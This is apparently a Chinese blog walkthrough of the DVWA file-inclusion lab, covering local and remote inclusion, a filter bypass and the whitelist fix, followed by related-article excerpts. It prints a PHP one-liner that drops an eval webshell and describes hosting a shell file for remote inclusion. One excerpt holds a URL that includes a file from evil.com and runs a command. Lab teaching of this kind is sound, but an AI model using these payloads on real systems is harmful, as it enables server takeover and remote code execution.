DVWA文件包含漏洞(file inclusion)

最新推荐文章于 2025-04-07 23:15:21 发布
最新推荐文章于 2025-04-07 23:15:21 发布
阅读量1.2k 收藏 3
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 网安 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kirito_pio/article/details/106565478

目录

1、low级别

1.1 本地文件包含

1.2 远程文件包含

2、medium级别

3、high级别

文件包含漏洞是在主机要执行的文件中添加包含木马的文件。

low级别和medium级别分别有远程文件包含(RFI)和本地文件包含(LFI),high级别使用了白名单,无法绕过。

1、low级别

1.1 本地文件包含

在 https://blog.youkuaiyun.com/kirito_pio/article/details/106547336 中,完成了对各个级别的文件上传,但是在执行high级别时只进行了上传,不能使用菜刀,因为图片是静态的文件,不能自己执行,需要等待请求。

图片中包含的一句话脚本如下,可以在执行时新建并写入一个php文件。

 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

对low级别的代码如下,直接对资源进行访问,不设置过滤。


<?php

    $file = $_GET['page']; //The page we wish to display 

?>

先根据 https://blog.youkuaiyun.com/kirito_pio/article/details/106547336 high级别进行图片的上传。

再切换到file inclusion,输入上传文件的网址,记得要把安全级别切换到low,high的话不会成功;如果出现各种字符,说明读取到了文件。

为了验证结果,可以去靶机下的/var/www/dvwa/vulnerabilities/fi进行查看,会发现增加了shell.php文件;最后可以通过菜刀对文件进行增删进行验证。

1.2 远程文件包含

远程文件包含是主机访问远端的一个服务器,所以要设置一个服务器,可以使用kali。

首先,保证靶机的allow_url_fopen是开启的(保证可以使用URL去包含文件),文件路径是/etc/php5/cli/php.ini

第二步,搭建服务器。我使用的是kali(ip:192.168.5.131),使用命令systemctl start apache2 开启服务,用systemctl status apache2检测状态。

kali存放网络文件的路径为/var/www/html,把需要访问的shell文件放在此路径下。

注意:此处的shell文件的类型不能设为.php,我用的是.txt。

第三步,进行访问。在 page= 后加入网址。

第四步,进行验证。和之前一样,使用菜刀;也可以去靶机的/var/www/dvwa/vulnerabilities/fi路径下进行查看,多了shell.php文件。

2、medium级别

对于网站的php代码,增加了对http/https协议的过滤。


<?php

    $file = $_GET['page']; // The page we wish to display 

    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);        


?>

因为本地文件包含不涉及http协议,所以,medium级别下本地文件包含和low级别下没有区别

远程文件包含,代码会筛选出http://和https://并删除,所以可以在之前的low级别下输入的网址进行插入。

其他操作均与low相同。

3、high级别

high级别是安全的。代码如下,指定了执行的白名单,只允许特定的文件执行。


<?php
        
    $file = $_GET['page']; //The page we wish to display 

    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }

 

DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1428
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
DVWA包含漏洞file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA包含漏洞file Inclusion
weixin_45116657的博客
09-10 3163
hahaha
dvwaFile Inclusion
Alsn86的博客
02-04 840
dvwaFile Inclusion 进行包含的文件名由get方法的page参数传递 看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =
dvwa篇之文件包含漏洞低、中、高三个级别的演示(小白必备!!!)
最新发布
qq_61426144的博客
04-07 1004
简介:文件包含其初衷是应用于在后端脚本中把一些重复的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次进行编写,这种调用文件的过程一般被称为文件包含,其本身并没有什么危害,但是如果对包含的参数可控,那么在这一过程中就会产生文件包含漏洞,而文件包含又分为本地文件包含远程文件包含
DVWA靶场------File Inclusion文件包含漏洞
m0_65712192的博客
11-13 1820
DVWA靶场------File Inclusion文件包含漏洞
DVWAFile Inclusion
Sukiugg的博客
07-28 285
1. url改为: http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd
DVWA-File Inclusion
weixin_44866139的博客
02-07 326
文件包含是指应用程序加载的文件(本地/远程)可以由用户提交的数据控制,从而导致攻击者控制恶意文件在服务器上执行. 对于php来说,常见的文件包含函数有如下: require:找不到被包含的文件,报错,并且停止运行脚本。 include:找不到被包含的文件,只会报错,但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...
DVWA文件包含漏洞File Inclusion
qq_54537919的博客
06-27 1243
DVWA文件包含漏洞File Inclusion
DVWA】16. File Inclusion文件包含(High+Impossible)
Zichel77的博客
01-10 966
与之前的代码示例相比,这段代码更加具体明确,只允许特定的文件名被包含,其他文件将被拒绝。对于更复杂的场景,可能需要更细致的输入验证过滤机制。fnmatch()` 函数是一种用于执行模式匹配的强大函数,类似于通配符匹配。它检查 $file 是否等于 “include.php”、“file1.php”、“file2.php” 或 “file3.php”,只有与指定文件名完全匹配的文件才会被包含,其他文件将被认为是错误的。输入验证:代码使用条件语句对变量 $file 进行验证。要求我们用file开头就开咯。
DVWA】15. File Inclusion文件包含(xampp版PHP报错解决+Low+Medium)
Zichel77的博客
01-10 1182
存在服务器文件包含漏洞时无论文件后缀是否是php,均当做php文件来执行。当服务器的php配置中,allow_url_fopenallow_url_include打开时,服务器会允许包含远程服务器上的文件。页面返回了报错,但同时也暴露了页面的地址D:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php。以上的限制其实主要针对的是远程文件的读取,因此本地文件的读取依然不受限制。如果要破解对远程文件的限制,我们对http://进行改写即可,以下为例子。
DVWA V1.9:File Inclusion文件包含
qq_43233085的博客
01-24 599
DVWA V1.9:File Inclusion文件包含File Inclusion 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 File Inclusion 介绍 一些Web应用程序允许用户指定直接用于文件流的输入,或者允许用户将文件上载到服务器。 在稍后的时间,Web应用...
DVWA靶场文件包含low
qq_14902381的博客
08-15 1035
dvwa靶场文件包含漏洞
DVWAFile Inclusion文件包含
weixin_41182861的博客
06-04 285
前言
DVWAFile Inclusion文件包含
RexHa的博客
10-01 1354
dvwa 文本包含漏洞的解析
DVWA靶场系列(三)—— File Inclusion文件包含
qq_45612828的博客
07-12 1260
DVWA靶场系列(三)—— File Inclusion文件包含
DVWA-File Inclusion文件包含
Cwillchris的博客
10-28 2570
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
4、DVWA:file include (文件包含漏洞)
qq_44598397的博客
09-25 1214
4、file include (文件包含漏洞) File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包...
DVWA-文件包含漏洞
weixin_51706044的博客
05-16 1947
文章目录原理以及介绍一、文件包含二、环境配置三、LOW级别查看源码本地文件包含远程文件包含 原理以及介绍 在通过PHP的相应函数(比如include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 文件包含漏洞的形成,需要满足两个条件: include()等函数通过动态变量的方式引入需要包含的文件 用户能够控制这个动态变量 在文件包含漏洞中,进行文件包含时PHP 伪协议的掌握是必不可少的 这里不一一说明,留下大佬的博客可以去借阅学
【工具-DVWADVWA渗透系列四:File Inclusion
qqchaozai的专栏
10-22 2786
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion文件包含)5.File Uploa...
DVWA靶场文件包含漏洞(File Inclusion)远程文件
04-03
<think>好的,我现在需要处理用户关于DVWA靶场中文件包含漏洞远程利用防御方法的问题。首先,我需要回忆文件包含漏洞的基本知识,特别是远程文件包含(RFI)的部分。根据用户提供的引用资料,特别是引用[3][4],远程文件包含需要allow_url_include配置开启,而DVWA的高级别可能已经关闭了这个选项。 接下来,用户想知道远程利用的方法。根据引用[4],当allow_url_include开启时,攻击者可以通过包含远程服务器上的恶意文件来执行代码。例如,使用http://或ftp://协议引入外部脚本。但需要注意,在DVWA的高级别设置中,可能已经对文件路径做了限制,比如必须以file://开头,如引用[5]提到的,这时候可能需要使用file://伪协议,但这是本地包含而非远程。 然后,关于防御方法,引用[1]提到使用绝对路径避免动态包含,引用[2][3]讨论了白名单验证关闭危险配置。需要综合这些信息,给出具体的修复建议,如输入验证、禁用远程包含等。 在生成相关问题的时候,要涵盖漏洞原理、利用条件、防御措施以及与其他漏洞的区别,确保问题全面。同时要检查引用标注是否正确,每个引用对应的内容是否准确。例如,引用[5]提到High级别使用file://开头,这可能影响远程包含的可能性,需要指出远程包含的条件是否满足。 最后,确保回答结构清晰,分点说明利用方式防御方法,并正确引用相关来源。同时,验证LaTeX格式是否正确,但根据用户的问题,可能不需要数学公式,但如果有涉及变量或路径的地方,要使用$...$格式。例如,路径参数可以写成$_GET['page']$这样的形式。 总结步骤:1. 解释远程利用的条件方法,引用相关材料;2. 列出防御措施,结合多个引用中的建议;3. 生成相关问题,覆盖漏洞的各个方面。</think>### DVWA 文件包含漏洞File Inclusion远程利用及防御方法 #### 一、远程文件包含(RFI)利用方式 1. **利用条件** - PHP配置中需开启 `allow_url_include=On`(默认关闭,需手动修改`php.ini`)[^4]。 - 目标代码中存在动态包含用户可控参数的漏洞,例如 `include($_GET['page']);`。 2. **攻击步骤** - **构造恶意文件**:在远程服务器(如攻击者控制的站点)存放包含恶意代码的文件,例如 `http://evil.com/shell.txt`,内容为 `<?php system($_GET['cmd']);?>`。 - **触发包含**:通过URL参数注入远程文件路径,例如: ``` http://dvwa/vulnerabilities/fi/?page=http://evil.com/shell.txt&cmd=id ``` 若配置允许远程包含,服务器会加载并执行远程文件中的代码,实现命令注入[^4]。 3. **绕过限制** - 若High级别限制路径以`file://`开头(如DVWA的High级别),可通过伪协议`file://`结合路径遍历尝试本地文件包含(LFI),例如: ``` page=file:///var/www/html/config.php ``` 但此方式属于本地包含,非严格意义的远程利用[^5]。 --- #### 二、防御方法 1. **输入验证与白名单** - 对用户输入的包含路径进行严格校验,仅允许预定义的合法文件名(如`home.php`、`about.php`),拒绝包含外部路径或协议[^2][^1]。 2. **禁用危险配置** - 关闭PHP的远程文件包含功能:在`php.ini`中设置 `allow_url_include=Off` `allow_url_fopen=Off`[^4]。 3. **使用绝对路径** - 避免动态拼接路径,改用硬编码的绝对路径,例如: ```php $allowed_pages = ['home' => '/var/www/html/home.php']; if (isset($_GET['page']) && array_key_exists($_GET['page'], $allowed_pages)) { include($allowed_pages[$_GET['page']]); } ``` 此方法彻底消除路径遍历风险。 4. **文件后缀限制** - 强制添加固定后缀(如`.php`),防止包含非预期文件类型: ```php $page = $_GET['page'] . '.php'; ``` 5. **代码隔离** - 将可包含文件存放在Web根目录外,避免通过URL直接访问敏感文件[^3]。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值